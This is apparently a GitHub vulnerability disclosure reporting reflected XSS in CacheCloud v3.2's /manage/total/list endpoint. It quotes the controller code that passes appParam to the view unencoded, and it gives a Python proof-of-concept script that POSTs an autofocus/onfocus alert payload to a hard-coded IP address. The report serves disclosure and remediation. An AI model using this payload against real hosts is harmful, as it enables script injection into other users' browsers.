
XSS vulnerability on /manage/total/list #365

@NinjaGPT

Description

@NinjaGPT

XSS vulnerability on /manage/total/list

Summary

In the latest version (v3.2) of CacheCloud, the endpoint /manage/total/list does not encode user-controllable parameters before rendering them in the web page, resulting in an XSS vulnerability. This allows an attacker to launch XSS attacks against users of the application.

Details

  • SOURCE & SINK
// src/main/java/com/sohu/cache/web/controller/TotalManageController.java#L55-L95
/**
 * Renders the application list for the "total" management page.
 *
 * <p>{@code appParam} is a request-supplied value (bound by Spring MVC). It is used
 * to narrow the search and is then placed in the model, unchanged, under the key
 * "appParam". No validation or output encoding happens in this method, so the
 * "manage/total/list" view is the only place left to HTML-encode it; if the view
 * echoes it verbatim the value is reflected into the page.
 *
 * @param request   source of the current user and of the "pageNo"/"pageSize" parameters
 * @param response  not used in this method
 * @param appParam  free-text search input; all-digit values are treated as an app id,
 *                  anything else as an app name
 * @param model     receives the attributes listed at the end of the method
 * @param appSearch search criteria, populated from appParam and the page settings
 * @return the "manage/total/list" view
 */
@RequestMapping({"/list"})
public ModelAndView doTotalList(HttpServletRequest request, HttpServletResponse response, String appParam, Model model, AppSearch appSearch) {
    AppUser currentUser = this.getUserInfo(request);
    List<SystemResource> redisVersionList = this.resourceService.getResourceList(ResourceEnum.REDIS.getValue());
    // Untrusted input enters here. A numeric string becomes the app id, anything
    // else is used as an app-name search string.
    // NOTE(review): isNumeric does not bound the length, so an all-digit value that
    // exceeds the range of a long would make parseLong throw -- confirm how the
    // framework surfaces that exception.
    if (!StringUtils.isEmpty(appParam)) {
        if (StringUtils.isNumeric(appParam)) {
            appSearch.setAppId(Long.parseLong(appParam));
        } else {
            appSearch.setAppName(appParam);
        }
    }

    int totalCount = this.appService.getAppDescCount(currentUser, appSearch);
    // Paging parameters default to page 1 / 20 rows when missing or unparsable.
    int pageNo = NumberUtils.toInt(request.getParameter("pageNo"), 1);
    int pageSize = NumberUtils.toInt(request.getParameter("pageSize"), 20);
    Page page = new Page(pageNo, pageSize, totalCount);
    appSearch.setPage(page);
    List<AppDesc> apps = this.appService.getAppDescList(currentUser, appSearch);
    List<AppDetailVO> appDetailList = new ArrayList();
    if (apps != null && apps.size() > 0) {
        // Enrich each result with its detail record and carry over the backup type.
        for(AppDesc appDesc : apps) {
            AppDetailVO appDetail = this.appStatsCenter.getAppDetail(appDesc.getAppId());
            appDetail.getAppDesc().setBackupType(appDesc.getBackupType());
            appDetailList.add(appDetail);
        }
    } else {
        // No rows: make the page object report zero instead of the earlier count.
        page.setTotalCount(0);
    }

    // "apps" and "list" both hold the same result list.
    model.addAttribute("apps", apps);
    model.addAttribute("appDetailList", appDetailList);
    model.addAttribute("list", apps);
    model.addAttribute("appOperateActive", SuccessEnum.SUCCESS.value());
    // The raw search string is handed to the view without encoding. The template
    // must HTML-encode it wherever it is rendered (for example when echoing it
    // back into the search field); otherwise it is reflected as-is.
    model.addAttribute("appParam", appParam);
    model.addAttribute("page", page);
    model.addAttribute("persistenceType", appSearch.getPersistenceType());
    model.addAttribute("backupType", appSearch.getBackupType());
    model.addAttribute("redisVersionList", redisVersionList);
    return new ModelAndView("manage/total/list");
}

POC

import requests
from requests.sessions import Session


class CustomSession(Session):
    """Session subclass that stamps a fixed set of headers onto every request.

    The reporter's tooling uses this so each request carries the same
    referer/origin/User-Agent values; the headers are merged into whatever the
    caller passed, with the fixed values taking precedence.
    """

    def request(
        self,
        method,
        url,
        params=None,
        data=None,
        headers=None,
        cookies=None,
        files=None,
        auth=None,
        timeout=None,
        allow_redirects=True,
        proxies=None,
        hooks=None,
        stream=None,
        verify=None,
        cert=None,
        json=None,
    ):
        # Names of the keyword arguments forwarded to Session.request.
        arg_names = (
            'method', 'url', 'params', 'data', 'headers', 'cookies', 'files',
            'auth', 'timeout', 'allow_redirects', 'proxies', 'hooks', 'stream',
            'verify', 'cert', 'json'
        )
        # Snapshot the arguments by name so they can be forwarded as keywords.
        local_variables = locals()
        local_variables = {n: local_variables[n] for n in local_variables if n in arg_names}
        # Start from the caller's headers (or an empty dict) and overlay the
        # fixed header set. The distinctive User-Agent value is a useful
        # signature for anyone reviewing server logs for this traffic.
        local_variables['headers'] = local_variables.get('headers') or dict()
        local_variables['headers'].update({
            'referer': 'http://34.169.199.145:40101/admin/app/list',
            'User-Agent': 'oxpecker',
            'accept-language': 'en-US',
            'x-requested-with': 'XMLHttpRequest',
            'origin': 'http://34.169.199.145:40101',
            'upgrade-insecure-requests': '1',
            'pragma': 'no-cache',
            'cache-control': 'no-cache',
            'accept-encoding': 'gzip, deflate',
        })
        return super().request(**{n: local_variables[n] for n in local_variables if n in arg_names})


# Rebind the module attribute so that the module-level helpers (requests.post
# below), which instantiate requests.sessions.Session, pick up the subclass.
requests.sessions.Session = CustomSession
# ================================== Poc Start ===================================
import requests

# Target endpoint from the report; the reflected parameter is "appParam", the
# other form fields mirror an ordinary list request.
url = 'http://34.169.199.145:40101/manage/total/list'
malicious_payload = 'X" tabindex="1" autoFoCUs oNFoCUS=alert("zast-xss")//'
data = {'appParam': malicious_payload, 'pageNo': '1', 'pageSize': '20', 'userId': '1'}
# A single POST; redirects are not followed so the immediate response (and its
# status code) is what gets printed. verify=False has no effect over plain http.
response = requests.post(url, data=data, verify=False, allow_redirects=False)
print('Status Code:', response.status_code)
print('Response Text:', response.text)
# =================================== Poc End ====================================
  • Screenshot
Image
